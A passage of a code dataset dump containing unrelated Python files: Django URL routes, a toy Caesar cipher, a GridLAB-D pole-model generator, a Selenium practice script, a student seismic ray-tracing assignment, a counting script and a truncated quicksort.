import views\n\n# Avoid hardcoding URLs\napp_name = 'product'\n\nurlpatterns = [\n # ~/product/\n url(r'^$', views.ProductView.as_view(), name='product'),\n\n # ~/product/<pk>/\n url(r'^(?P<pk>[0-9]+)/$', views.DetailView.as_view(), name=\"detail\"),\n\n # ~/product/kids\n url(r'^kids/', views.KidsView.as_view(), name='kidsView'),\n\n # ~/product/add/\n url(r'^add/$', views.ProductCreate.as_view(), name='product-add'),\n\n # ~/product/<pk>/update\n url(r'^(?P<pk>[0-9]+)/update$', views.ProductUpdate.as_view(), name='product-update'),\n\n # ~/product/<pk>/delete/\n url(r'^(?P<pk>[0-9]+)/delete/$', views.ProductDelete.as_view(), name='product-delete'),\n]","sub_path":"product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"479939169","text":"import random\r\nalphabets= \"\"\"abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz'\"\"\"\r\n\r\ndef encrypt(message):\r\n global shift_generator\r\n # one random shift per message so that decrypt() can reverse it\r\n shift_generator = random.randint(1, 26)\r\n print(\"Shift: \", shift_generator)\r\n encrypted=[]\r\n for shift in message:\r\n if shift in alphabets and shift.isalpha():\r\n old_position=alphabets.index(shift)\r\n new_position=(old_position+shift_generator)%26\r\n encrypted+=alphabets[new_position]\r\n else:encrypted += list(shift)\r\n return ''.join(encrypted)\r\n\r\n\r\n\r\n\r\ndef decrypt(encrypted):\r\n decrypted=[]\r\n for shift in encrypted:\r\n if shift in alphabets and shift.isalpha():\r\n old_position = alphabets.index(shift)\r\n new_position = (old_position - shift_generator)%26\r\n decrypted += alphabets[new_position]\r\n else:decrypted += list(shift)\r\n return ''.join(decrypted)\r\n\r\nif __name__ == \"__main__\":\r\n message = input(\"Type message: \")\r\n encryption=encrypt(message)\r\n print(\"Encrypted Message: \", encryption)\r\n print(\"Decrypted Message: \",decrypt(encryption))\r\n\r\n\r\n\r\n","sub_path":"cipher.py","file_name":"cipher.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"526303090","text":"# Syntax: create_poles INPUTFILE OPTIONS ...\n\"\"\"Create poles for a GridLAB-D model\n\nSYNTAX\n\nShell:\n\n bash$ gridlabd create_poles INPUTFILE OPTIONS ...\n\nGLM:\n\n #gridlabd create_poles INPUTFILE OPTIONS ...\n\nPython:\n\n >>> import create_poles\n >>> create_poles.main(INPUTFILE,OPTIONS ...)\n\nOutput options:\n\n --include_network include the input network in the output\n GLM file\n \n --output=GLMNAME set the output GLM file name\n (default is /dev/stdout)\n \n --format={GLM,JSON} specify the output format (default is\n GLM)\n\nPole options:\n\n --ignore_length ignore the line length when computing pole\n locations\n \n --ignore_location ignore node latitude/longitude when\n computing pole locations\n \n --pole_type=CONFIGURATION_NAME set the pole type to use\n\n --pole_data=POLEDATA_CSV use CSV data of pole properties\n\n --mount_data=MOUNTDATA_CSV use CSV data for equipment and line mounts\n \n --spacing=FEET set the pole spacing in feet on overhead\n power lines\n\nWeather options:\n\n --weather=NAME name the weather object and do not\n download any weather data\n \n --location=LAT,LON specify the weather location\n \n --year=YEAR specify the weather year to use\n (default to use forecast weather)\n \n --timezone=TZSPEC specify the timezone (overrides default\n based on location)\n \n --include_weather obtain weather data for the year specified\n or 
realtime forecast\n\nDESCRIPTION\n\nThe `create_poles` subcommand automatically generates a pole model for a\nnetwork model and mounts the overhead lines and equipment to the newly\ncreated poles. The output is written to `/dev/stdout` unless the\n`--output=GLMNAME` option is given.\n\nThe `--pole_type=CONFIGURATION_NAME` and `--spacing=FEET` options are\nrequired. Configuration names may be obtained from the\n`pole_configuration.glm` library (see [[/Subcommand/Library]] for details on\nusing libraries).\n\nSome network models include latitude and longitude information. When this\ninformation is present, the line length information is checked. If there is a\ndiscrepancy between these, a warning is printed and the latitude/longitude\ninformation is used. The `--ignore_length` option will suppress this\nwarning. The `--ignore_location` option will cause the model to use the line\nlength data instead.\n\nThe `--include_network` option adds a `#include \"FILENAME\"` directive in the output\nto ensure that the resulting GLM file contains all the objects required to\nrun the simulation, e.g.,\n\n $ gridlabd create_poles example.glm --output=model.glm --spacing=100 \\\n --pole_type=WOOD-EC-45/4 --weather=example\n $ gridlabd example.glm model.glm\n\nAlternatively, when the input is a GLM, the two GLM files can be used together\nin a single command, e.g.,\n\n $ gridlabd create_poles example.glm --output=model.glm --spacing=100 \\\n --pole_type=WOOD-EC-45/4 --include_network --weather=example\n $ gridlabd model.glm\n\nThe python usage requires the options to be provided as keyword arguments where\nthe leading `--` is omitted, e.g., the command \n\n >>> gridlabd python\n >>> import create_poles\n >>> create_poles.main('example.glm',output='model.glm',spacing=100,\\\n pole_type='WOOD-EC-45/4',include_network=True,weather=example)\n\nis equivalent to\n\n $ gridlabd create_poles example.glm --output=model.glm --spacing=100 \\\n --pole_type=WOOD-EC-45/4 --include_network --weather=example\n\nPROPERTIES\n\nPole and pole_mount objects are created with the following default\nproperties:\n\n * pole\n - install_year: 2000\n - tilt_angle: 0 deg\n - tilt_direction: 0 deg\n * pole_mount\n height: 40 ft\n offset: 0 ft\n area: 0 sf\n direction: 0 deg\n weight: 0 lb\n\nThe properties may be set at the command line using the option\n`--TYPE.PROPERTY=VALUE`, e.g. `--pole.install_year=2010`.\n\nProperties may be associated with poles and mounts on specific lines using the\n`--pole_data=POLEDATA_CSV` and `--mount_data=MOUNTDATA_CSV` options. The\nformat of the CSV files must always include the line name in the `name`\ncolumn and the property values in columns using the property name. For\nexample,\n\n name,install_year,tilt_angle\n overhead_line1,2010,0\n overhead_line2,2010,0\n overhead_line3,2010,0\n\nassigns the install year and tilt angle to all poles associated with the\nnamed lines. If a value is omitted, the property is deleted, which causes\nit to take on the default value.\n\nWEATHER\n\nIf `--include_weather` is specified, then the weather forecast data is linked\nbased on location, if any, and the clock is automatically set based on the\nweather window. If the `--weather=NAME` option is provided, all poles\ncreated will use the specified weather object instead of using downloaded\nweather, and the clock will not be set. If the `--year` option is specified,\nthen the historical weather data for that year and location is used, and the\nclock is set to run the entire year. 
Without the `--year` specification, a\nrealtime weather forecast is used, and the clock is set to the forecast\nwindow. By default the timezone is determined from the location, unless the\n`--timezone=TZSPEC` option is used to override it. If `--ignore_location` is\nspecified, then the local system timezone specification is used.\n\nCAVEAT\n\nWhen saving to JSON, only the new pole data is included. Options that\nchange the clock or include networks and weather are ignored.\n\nSEE ALSO\n\n - Module powerflow pole and pole_mount\n - Subcommand nsrdb_weather and noaa_forecast\n\"\"\"\n\nimport sys, os, json, datetime, subprocess\nimport math, pandas\nfrom haversine import haversine, Unit\nimport nsrdb_weather\n\ndef error(msg,code=None):\n \"\"\"Display error message and exit with code\"\"\"\n print(f\"ERROR [create_poles]: {msg}\",file=sys.stderr)\n if code == None:\n return\n if type(code) is int:\n exit(code)\n raise Exception(f\"exit code '{code}' is not valid\")\n\ndef warning(msg):\n \"\"\"Display a warning message\"\"\"\n print(f\"WARNING [create_poles]: {msg}\",file=sys.stderr)\n\ndef syntax(code=None):\n \"\"\"Display syntax/help message\n\n Parameters:\n\n - code (int or None) Output to stdout if evaluates to False, otherwise output to stderr. \n If None, output full help, otherwise output only syntax line.\n If integer, exit with code\n\n Exceptions:\n\n - ValueError Type of code is not int or None\n \"\"\"\n if not code:\n output = (lambda x: print(x,file=sys.stdout))\n else:\n output = (lambda x: print(x,file=sys.stderr))\n if code == None:\n output(__doc__)\n else:\n output(f\"Syntax: gridlabd create_poles INPUTFILE OPTIONS ...\")\n if type(code) is int:\n exit(code)\n elif code != None:\n raise ValueError(f\"error code '{code}' is not valid\")\n\nspacing = None\npole_type = None\nweather_name = None\nlocation = None\nyear = None\ntimezone = None\nweather_locations = []\nproperties = {\n \"pole\" : dict(\n install_year = \"2000\",\n tilt_angle = \"0 deg\",\n tilt_direction = \"0 deg\",\n ),\n \"pole_mount\" : dict(\n height = \"40 ft\",\n offset = \"0 ft\",\n area = \"0 sf\",\n direction = \"0 deg\",\n weight = \"0 lb\",\n ),\n }\nproperty_data = {}\nequipment_data = {}\npole_nodes = {}\nshort_line_length = 10\n\ndef get_timezone():\n \"\"\"Get local timezone based on how datetime works\"\"\"\n tzlist = [\n \"EST+5EDT\",\n \"CST+6CDT\",\n \"MST+7MDT\",\n \"PST+8PDT\",\n \"AST+9ADT\",\n \"HST+10HDT\",\n ]\n now = datetime.datetime.now()\n tz = datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo.tzname(now)\n for tzspec in tzlist:\n if tz in tzspec:\n return tzspec\n return tz\n\ndef get_pole(model,name,line):\n \"\"\"Find (and possibly create) specified pole in the model\"\"\"\n if name in pole_nodes.keys():\n return get_pole(model,pole_nodes[name],line)\n\n global pole_type\n if name not in model[\"objects\"]:\n \n # create pole object\n model[\"objects\"][name] = {\n \"configuration\":pole_type,\n }\n pole = model[\"objects\"][name]\n\n # add weather link\n if weather_name:\n\n # link weather based on name given\n pole[\"weather\"] = weather_name\n\n # try location, if specified\n elif location:\n\n # link weather based on location\n pole[\"weather\"] = \"weather@\" + nsrdb_weather.geohash(*location)\n\n # try pole location, if any\n elif \"latitude\" in pole.keys() and \"longitude\" in pole.keys():\n lat = float(pole[\"latitude\"].split()[0])\n lon = float(pole[\"longitude\"].split()[0])\n if (lat,lon) not in weather_locations:\n 
weather_locations.append((lat,lon))\n pole[\"weather\"] = \"weather@\" + nsrdb_weather.geohash(lat,lon)\n\n # no weather\n else:\n error(f\"unable to identify weather for pole '{name}', missing required location information\",2)\n\n pole.update(properties[\"pole\"])\n if line in property_data.keys():\n for prop,value in property_data[line].items():\n if prop in pole.keys():\n if value in [None] or (type(value) is float and math.isnan(value)):\n del pole[prop]\n else:\n pole[prop] = value\n return model[\"objects\"][name]\n\ndef mount_line(model,pole,line,position):\n \"\"\"Connect line to pole\"\"\"\n global spacing\n poledata = get_pole(model,pole,line)\n poledata[position] = {\"class\":\"pole_mount\",\"equipment\":line,\"pole_spacing\":f\"{spacing} ft\"}\n poledata[position].update(properties[\"pole_mount\"])\n # if line in property_data.keys():\n # for prop,value in property_data[line].items():\n # if prop in poledata[position].keys():\n # if value in [None] or (type(value) is float and math.isnan(value)):\n # del poledata[position][prop]\n # else:\n # poledata[position][prop] = value\n return poledata\n\ndef mount_equipment(model,pole,name,position):\n \"\"\"Connect line to pole\"\"\"\n global spacing\n poledata = get_pole(model,pole,name)\n poledata[position] = {\"class\":\"pole_mount\",\"equipment\":name,\"pole_spacing\":f\"{spacing} ft\"}\n poledata[position].update(properties[\"pole_mount\"])\n if name in equipment_data.keys():\n for prop,value in equipment_data[name].items():\n if prop in poledata[position].keys():\n if value in [None] or (type(value) is float and math.isnan(value)):\n del poledata[position][prop]\n else:\n poledata[position][prop] = value\n return poledata\n\ndef write_object(otype,name,data,output,indent_level=0):\n \"\"\"Write object data in GLM\"\"\"\n indent = ' '*indent_level\n print(indent+f\"object {otype}\",file=output)\n print(indent+\"{\",file=output)\n print(indent+f\" name \\\"{name}\\\";\",file=output)\n for item,value in data.items():\n if item in [\"class\"]:\n continue\n if type(value) is dict:\n if \"class\" in value.keys():\n write_object(value[\"class\"],item,value,output,indent_level+1)\n else:\n print(indent+f\" {item} \\\"{value}\\\";\",file=output)\n print(indent+\"}\"+(';'*min(indent_level,1)),file=output)\n\ndef main(inputfile,**options):\n \"\"\"Main pole creation function\"\"\"\n # options\n global spacing\n global pole_type\n global location\n global weather_name\n global year\n global timezone\n global weather_locations\n ignore_length = False\n ignore_location = False\n include_network = False\n include_weather = False\n outputfile = \"/dev/stdout\"\n output_format = \"GLM\"\n output = sys.stdout\n for opt,value in options.items():\n if opt == \"spacing\":\n spacing = float(value)\n elif opt == \"ignore_length\":\n ignore_length = True\n elif opt == \"ignore_location\":\n ignore_location = True\n elif opt == \"include_network\":\n include_network = True\n elif opt == \"include_weather\":\n include_weather = True\n elif opt == \"output\":\n outputfile = value\n output = open(outputfile,\"wt\")\n elif opt == \"pole_type\":\n pole_type = value\n elif opt == \"weather\":\n weather_name = value\n elif opt == \"location\":\n location = list(map(lambda x:float(x),value.split(\",\")))\n if not location in weather_locations:\n weather_locations.append(location)\n elif opt == \"year\":\n year = int(value)\n elif opt == \"format\":\n output_format = value\n elif opt == \"timezone\":\n timezone = value\n elif opt == \"pole_data\":\n 
property_data.update(pandas.read_csv(value,index_col=[\"name\"],dtype=str,na_values='').to_dict('index'))\n elif opt == \"mount_data\":\n equipment_data.update(pandas.read_csv(value,index_col=[\"name\"],dtype=str,na_values='').to_dict('index'))\n else:\n found = False\n for otype in properties.keys():\n if opt.startswith(otype+\".\"):\n properties[otype][opt.split(\".\")[1]] = value\n found = True\n if not found:\n raise Exception(f\"options '{opt}={value}' is not valid\") \n if spacing == None:\n raise Exception(\"option for spacing is required\")\n if pole_type == None:\n raise Exception(\"option for pole_type is required\")\n\n # input\n if inputfile.endswith(\".glm\"):\n glmfile = inputfile\n jsonfile = inputfile.replace(\".glm\",\".json\")\n code = os.system(f\"gridlabd -C {glmfile} -o {jsonfile}\")\n if code != 0:\n error(f\"unable to compile '{glmfile}' into {jsonfile} (error code {code})\",2)\n elif inputfile.endswith(\".json\"):\n jsonfile = inputfile\n else:\n error(f\"main(inputfile='{inputfile}',options={options}): inputfile type not recognized\",1)\n with open(jsonfile,\"r\") as f:\n model = json.load(f)\n\n # process pole-mounted equipment in model and short lines\n objects = model[\"objects\"]\n poles = {}\n global pole_nodes\n for name in list(objects.keys()):\n data = model[\"objects\"][name]\n if \"from\" in data.keys() and \"to\" in data.keys() and \\\n ( not \"length\" in data.keys() or float(data[\"length\"].split()[0]) < short_line_length ):\n fromname = data[\"from\"]\n toname = data[\"to\"]\n\n # add pole to shared node list\n if not toname in pole_nodes.keys():\n pole_nodes[toname] = []\n pole_nodes[toname].append(fromname)\n\n # mount equipment on pole\n poles[f\"pole_{fromname}\"] = mount_equipment(model,f\"pole_{fromname}\",name,f\"mount_{name}\")\n\n # process overhead lines in model\n for name in list(objects.keys()):\n data = model[\"objects\"][name]\n if \"class\" in data.keys() and data[\"class\"] == \"overhead_line\":\n length = float(data[\"length\"].split()[0])\n fromname = data[\"from\"]\n toname = data[\"to\"]\n fromdata = objects[fromname]\n todata = objects[toname]\n\n # try to use lat/lon\n if not ignore_location:\n\n # lat/lon found\n if \"latitude\" in fromdata.keys() and \\\n \"longitude\" in fromdata.keys() and \\\n \"latitude\" in todata.keys() and \\\n \"longitude\" in todata.keys():\n\n # length of line based on lat/lon\n dist = haversine([float(fromdata[\"latitude\"]),float(fromdata[\"longitude\"])],\n [float(todata[\"latitude\"]),float(todata[\"longitude\"])],Unit.FEET)\n \n # check length\n if dist != length:\n\n # if ignore line length\n if ignore_length:\n\n # use length based on lat/lon\n abs(length-dist) > spacing/2\n\n # don't ignore length\n else:\n\n # print a warning\n warning(f\"overhead_line '{name}' length '{float(data['length'].split()[0])}' not within {spacing/2} ft of distance {length} from '{fromname}' to '{toname}' \")\n\n # place first pole\n poles[f\"pole_{fromname}\"] = mount_line(model,f\"pole_{fromname}\",name,f\"mount_{name}_{fromname}\")\n\n # place intermediate poles\n for position in range(int(spacing),int(length),int(spacing)):\n poles[f\"pole_{name}_{position}\"] = mount_line(model,f\"pole_{name}_{position}\",name,f\"mount_{name}_{position}\")\n\n # place last pole\n poles[f\"pole_{toname}\"] = mount_line(model,f\"pole_{toname}\",name,f\"mount_{name}_{toname}\")\n\n # process node-like equipment\n for name in list(objects.keys()):\n data = model[\"objects\"][name]\n if \"phases\" in data.keys() and 
\"nominal_voltage\" in data.keys() and \\\n not \"from\" in data.keys() and not \"to\" in data.keys() and \\\n not \"pole_\"+name in poles.keys() and name not in pole_nodes.keys() and \\\n name in equipment_data.keys():\n if not \"status\" in data.keys():\n error(f\"equipment '{name}' cannot be mounted because it does not have required status property\",3)\n poles[f\"pole_{name}\"] = mount_equipment(model,f\"pole_{name}\",name,f\"mount_{name}\")\n\n # write GLM output\n if outputfile.endswith(\".glm\") or output_format == \"GLM\":\n\n # generate GLM data from model\n print(f\"// automatically generated model from command `{' '.join(sys.argv)}` on {datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S %z')}\",file=output)\n if include_network:\n print(f\"#include \\\"{inputfile}\\\"\",file=output)\n rc = subprocess.run(\"gridlabd library get pole_configuration.glm\".split())\n if rc.returncode:\n warning(\"pole configuration library not found\")\n rc = subprocess.run(\"gridlabd library config get DATADIR\".split(),capture_output=True)\n print(f\"#include \\\"{rc.stdout.decode().strip()}/pole_configuration.glm\\\"\",file=output)\n \n # generate GLM clock\n if year:\n if not timezone:\n if not ignore_location:\n # TODO: get timezone from location service\n timezone = get_timezone()\n warning(f\"location-based timezone is not implemented, using default '{timezone}'\")\n else:\n timezone = get_timezone()\n if timezone != model[\"clock\"][\"timezone\"]:\n fix_timezones(model)\n else:\n timezone = model[\"clock\"][\"timezone\"]\n starttime = datetime.datetime(year,1,1,0,0,0).strftime(\"%Y-%m-%d %H:%M:%S\")\n stoptime = datetime.datetime(year+1,1,1,0,0,0).strftime(\"%Y-%m-%d %H:%M:%S\")\n print(\"clock\",file=output)\n print(\"{\",file=output)\n print(f\" timezone \\\"{timezone}\\\";\",file=output)\n print(f\" starttime \\\"{starttime} {timezone[0:3]}\\\";\",file=output)\n print(f\" stoptime \\\"{stoptime} {timezone[0:3]}\\\";\",file=output)\n print(\"}\",file=output)\n\n # add weather data and player\n if include_weather:\n\n # download NSRDB weather\n if not weather_locations:\n\n error(\"cannot include weather because the model does not contain location information\",2)\n\n elif year:\n\n for latlon in weather_locations:\n weather_name = \"weather@\" + nsrdb_weather.geohash(*latlon)\n weather_data = nsrdb_weather.getyears(year.split(\",\"),*latlon)\n nsrdb_weather.writeglm(weather_data,glm=output,name=weather_name,csv=weather_name+\".csv\")\n\n # download NOAA forecast\n else:\n\n for latlon in weather_locations:\n weather_name = \"weather_\" + nsrdb_weather.geohash(*latlon)\n glmname = weather_name + \".glm\"\n csvname = weather_name + \".csv\"\n print(f\"#python -m noaa_forecast -p={latlon[0]},{latlon[1]} -i=60 -g={glmname} -c={csvname} -n={weather_name}\",file=output)\n print(f\"#include \\\"{glmname}\\\"\",file=output)\n\n # generate GLM pole data\n for name,data in poles.items():\n write_object(\"pole\",name,data,output)\n\n # generate weather and player\n\n # write JSON output\n elif outputfile.endswith(\".json\") or output_format == \"JSON\":\n if include_network:\n warning(f\"option '--include_network' is ignored when using output format '{output_format}'\")\n if include_weather:\n warning(f\"option '--include_weather' is ignored when using output format '{output_format}'\")\n if year or timezone:\n warning(f\"options '--year' and '--timezone' are ignored when using output format '{output_format}'\") \n json.dump(model,output,indent=4)\n\n else:\n error(f\"output format '{output_format}' 
is not valid\",1)\n\n return\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 1:\n syntax(1)\n glmfile = None\n options = {}\n debug = False\n for arg in sys.argv[1:]:\n args = arg.split(\"=\")\n if type(args) is list and len(args) > 1:\n token = args[0]\n value = args[1]\n elif type(args) is list:\n token = args[0]\n value = None\n else:\n token = args\n value = None\n if token in [\"-h\",\"--help\",\"help\"]:\n syntax()\n elif token in [\"--debug\"]:\n debug = not debug\n elif token.endswith(\".glm\") or token.endswith(\".json\"):\n glmfile = token\n elif token.startswith(\"--\"):\n options[token[2:]] = value\n else:\n error(f\"'{arg}' is not valid\",1)\n if glmfile:\n try:\n main(glmfile,**options)\n except Exception as msg:\n if debug:\n raise\n else:\n error(msg,1)\n","sub_path":"tools/create_poles.py","file_name":"create_poles.py","file_ext":"py","file_size_in_byte":22723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"113680287","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.select import Select\nimport time\npath = \"C:\\\\dev\\\\\\driver\\\\chrome\\\\chromedriver.exe\"\nbase_url = \"https://learn.letskodeit.com/p/practice\"\ndriver = webdriver.Chrome(executable_path= path)\ndriver.maximize_window()\ndriver.get(base_url)\ndriver.implicitly_wait(5)\nradio_btn1 = driver.find_element(By.XPATH, \"//input[@id = 'bmwradio']\" )\nradio_btn1.click()\ntime.sleep(5)\nradio_btn2 = driver.find_element(By.XPATH, \"//input[@id ='hondaradio']\")\nradio_btn2.click()\ntime.sleep(5)\nradio_btn3 = driver.find_element(By.XPATH, \"//input[@id ='benzradio']\")\nradio_btn3.click()\nchk_box1 = driver.find_element(By.ID, \"bmwcheck\")\nchk_box1.click()\ntime.sleep(5)\nchk_box2 = driver.find_element(By.ID, \"benzcheck\")\nchk_box2.click()\ntime.sleep(5)\ndpdw = driver.find_element(By.ID, \"carselect\")\nsel = Select(dpdw)\nsel.select_by_value(\"bmw\")\ntime.sleep(5) \nsel.select_by_index(2)\ntime.sleep(5)\nsel.select_by_visible_text(\"Benz\")\ntime.sleep(5)\ndriver.quit()\n\n\n\n\n\n\n\n\n","sub_path":"letskodeitautomate.py","file_name":"letskodeitautomate.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"112492103","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nRE = 6371.0 # Earth Radius\nRM = 3482.0 # Bottom of mantel radius\nRC = 1217.1 # Inner core radius\n# Slowness as function of r\n#\n\nclass Raytrace:\n\n def __init__(self):\n self.list_r = [] # list of values for radial coordinates\n self.list_th= [] # list of values for theta coordinates\n self.list_wave = [] # list of wave types\n \n def Vp(self, r):\n \"\"\" Vp as a function of radial position\n SOURCE: DOI: http://doi.org/10.2312/GFZ.NMSOP_r1_DS_2.1\n\n : param r : distance from Earth centre\n \"\"\"\n x = r/RE\n if(r <1217.1):\n v=11.24094-4.09689*x*x\n elif(r<3482):\n v=10.03904+3.75665*x-13.67046*x*x\n elif(r<3631):\n v=14.49470-1.47089*x\n elif(r<5611):\n v=25.1486-41.1538*x+51.9932*x*x-26.6083*x*x*x\n elif(r<5711):\n v=25.96984-16.93412*x\n elif(r<5961):\n v=29.38896-21.40656*x\n elif(r<6161):\n v=30.78765-23.25415*x\n elif(r<6251):\n v=25.41389-17.69722*x\n elif(r<6336):\n v=8.78541-0.74953*x\n elif(r<6351):\n v=6.50\n else:\n v=5.80\n return(v)\n\n def Vs(self, r):\n \"\"\" Vs as a function of radial position\n SOURCE: DOI: http://doi.org/10.2312/GFZ.NMSOP_r1_DS_2.1\n\n : param r : distance 
from Earth centre\n \"\"\"\n x = r/RE\n if(r <1217.1):\n v=3.56454-3.45241*x*x\n elif(r<3482):\n v=0.0\n elif(r<3631):\n v=8.16616-1.58206*x\n elif(r<5611):\n v=12.9303-21.2590*x+27.8988*x*x-14.1080*x*x*x\n elif(r<5711):\n v=20.76890-16.53147*x\n elif(r<5961):\n v=17.70732-13.50652*x\n elif(r<6161):\n v=15.24213-11.08552*x\n elif(r<6251):\n v=5.75020-1.27420*x\n elif(r<6336):\n v=6.706231-2.248585*x\n elif(r<6351):\n v=3.75\n else:\n v=3.36\n return(v)\n\n def u(self, r, wave):\n \"\"\" Return slowness for the specified wave and position\n\n : param r : distance from Earth centre\n : param wave : wave type : 'P' and 'S'\n \"\"\"\n if(wave=='P') : return(1./self.Vp(r))\n return(1./self.Vs(r))\n\n### MARKING coding 1\n def T_Delta_Int(self, r, p, wave):\n T = ((r**2)*self.u(r,wave)**2)/(r*((r**2)*self.u(r, wave)**2) - p**2)\n theta = (r*((r**2)*self.u(r, wave)**2)-p**2)\n integ = np.array([0., 0.])\n integ[0] = T\n integ[1] = theta\n return integ\n### END MARKING\n\n def Int(self, dr, p, wave):\n \"\"\" Integrate function T_Delta_Int from RE to bottom.\n Save the values of r, Delta and wave in the class lists 'list_r', \n 'list_th' and 'list_wave', used by 'plot_trajectory' to generate figures\n Return [T,Delta] for the path or [-1, 0] if the path does not exist.\n\n :param dr: radial step\n :param p : ray parameter\n :param wave : type of wave: 'P' or 'S'\n \"\"\"\n V = np.array([0., 0.])\n r = RE\n self.list_r.append(r)\n self.list_th.append(0)\n self.list_wave.append(wave)\n r+= dr*0.5 # move to middle of segment\n\n while(r*self.u(r, wave) > p): # while still going down\n V += self.T_Delta_Int(r, p, wave)*dr \n r -= dr\n self.list_r.append(r)\n self.list_th.append(V[1])\n self.list_wave.append(wave)\n if((wave == \"S\") and (r < RM)): # no S wave in outer core\n return(np.array([-1, 0]))\n \n r += dr # gone too far: move back\n### MARKING coding 1\n while (r*self.u(r, wave) <= p): \n### END MARKING\n V += self.T_Delta_Int(r, p, wave)*dr \n### MARKING coding 1\n r += dr\n### END MARKING\n self.list_r.append(r)\n self.list_th.append(V[1])\n self.list_wave.append(wave)\n\n return(V)\n \n### MARKING: coding 2\n #def Int_mPm(self, dr, p, wave):\n #def Int_mSm(self, dr, p, wave):\n #def Int_mPoSm(self, dr, p, wave): \n### END MARKING\n\n### MARKING coding 1\n\n def plot_VpVs(self):\n l = np.linspace(0, RE , 50)\n Vs=[]\n Vp=[]\n for n in range (len(l)):\n Vs.append(self.Vs(l[n]))\n Vp.append(self.Vp(l[n]))\n plt.plot(np.linspace(0,RE,50) , Vs ,'r-')\n plt.plot(np.linspace(0,RE,50) , Vp ,'b-')\n plt.ylabel(\"Vs , Vp\")\n plt.show()\n \n \n### END MARKING\n \n def plot_circle(self, R, col):\n \"\"\" Plot a circle of radius R in colour col\n\n :param R : circle radius\n :param col : circle color ('r', 'g', 'b', 'k', 'c', 'm', or 'y')\n \"\"\"\n circle2 = plt.Circle((0, 0), R, color=col, fill=False, linewidth=2)\n ax = plt.gca()\n #ax.cla() # clear things for fresh plot\n ax.add_artist(circle2)\n\n def trajectory(self, theta, wave, dr):\n \"\"\" Compute the trajectory of the specified wave \n Return Traveling time and angle (T, Delta)\n\n :param theta : incident angle in degrees\n :param path : Pm PmPm PmSm PmPoSm Sm SmPm SmSm SmPoSm\n :param dr : integration step in km\n \"\"\"\n self.list_r = []\n self.list_th = []\n self.list_wave = []\n self.theta=theta\n self.path=wave\n\n### MARKING coding 2\n th = np.radians(theta)\n p = RE*self.u(RE, wave)*np.sin(th)\n\n T, DeltaP = self.Int(dr, p, wave)\n### END MARKING\n\n return(T, np.degrees(DeltaP))\n \n \n def plot_trajectory(self):\n \"\"\" Plot the 
Earth Radius in green the boundary between the mantel and\n the outer core in magenta and the boundary between the 2 cores in\n red. Then plot the trajectory of the waves in black for P waves\n and blue for S waves.\n \"\"\"\n self.plot_circle(RE, \"g\")\n self.plot_circle(RM, \"m\")\n self.plot_circle(RC, \"r\")\n \n xl = []\n yl = []\n thmax = self.list_th[-1]*0.5 # to generate symmetric figure\n n = len(self.list_r) # number of data points\n wave = self.list_wave[0] # wave type\n\n### MARKING coding 1\n xl = [ ((self.list_r[i])*(np.cos(self.list_th[i]))-thmax) for i in range (n)]\n yl = [ ((self.list_r[i])*(np.sin(self.list_th[i]))-thmax) for i in range (n)]\n \n \n \n \n### END MARKING\n \n # select colour\n if(wave == \"P\") : col = \"k\"\n else: col = \"b\"\n \n plt.title(r'$\\theta=$'+str(self.theta)+\", path=\"+self.path)\n plt.plot(xl, yl, col)\n plt.axis([-8500, 8500, -6500, 6500], 'equal')\n plt.show()\n\n \n### MARKING coding 3\n # def plot_multi_trajectory(self, nocircle=False):\n### END MARKING\n\n\n\n","sub_path":"MathModelling/RayPath/ray_IASP91_v1.py","file_name":"ray_IASP91_v1.py","file_ext":"py","file_size_in_byte":6869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"226948606","text":"length=int(input())\nstatistics=[]\ninit=[int(x) for x in input().split()]\nwhile len(init)>0:\n key=init[0]\n statistics.append([key,init.count(key)])\n while key in init:\n init.remove(key)\ncountOdd=0\ncountEven=0\nfor i in statistics:\n if i[0]%2==1:\n countOdd+=i[1]\n else:\n countEven+=i[1]\nprint(min(countOdd,countEven))","sub_path":"Code/CodeRecords/2868/60614/286142.py","file_name":"286142.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"281220568","text":"#!/usr/bin/env python3\n\n# QUICKSORT\n# Worst Case - Theta(n^2)\n# Average Case - Theta(nlogn)\nimport sys\nimport csv\nimport time\nimport math\n# import matplotlib.pyplot as plt\nimport random\n\nsys.setrecursionlimit(10**9)\n\nSubmission = True\nInputFile = sys.argv[1]\n\n# Storing Data as nested list, where key is element 0 of nested list\nData = dict()\nwith open(InputFile + '.csv', 'r') as csvfile:\n csv_reader = csv.reader(csvfile)\n for row in csv_reader:\n Data[int(row[0])] = list()\n for i in row[1:]:\n Data[int(row[0])].append(i)\nArr = list(Data)\n\n\ndef DetermineInputSizeList(Arr):\n j = 1\n i = 2\n InputSize = []\n while i < len(Arr):\n InputSize.append(i)\n i = 2**(j)\n j += 1\n return InputSize\n\n\ndef RandomizedPartition(Arr, p, r):\n j = random.randint(p, r)\n Arr[j], Arr[r] = Arr[r], Arr[j]\n return Partition(Arr, p, r)\n\n\ndef Partition(Arr, p, r):\n pivot = Arr[r]\n i = p - 1\n for j in range(p, r):\n if Arr[j] <= pivot:\n i += 1\n Arr[i], Arr[j] = Arr[j], Arr[i]\n # Swap Elements\n Arr[i+1], Arr[r] = Arr[r], Arr[i+1]\n return (i+1) # Return element q\n\n\ndef QuickSort(Arr, p, r):\n if (p < r):\n q = RandomizedPartition(Arr, p, r)\n QuickSort(Arr, p, q - 1)\n QuickSort(Arr, q + 1, r)\n\n\ndef TimeAlgorithm(Arr, InputSize, p, r):\n ExecTime = []\n for i in InputSize:\n StartTime = time.time()\n 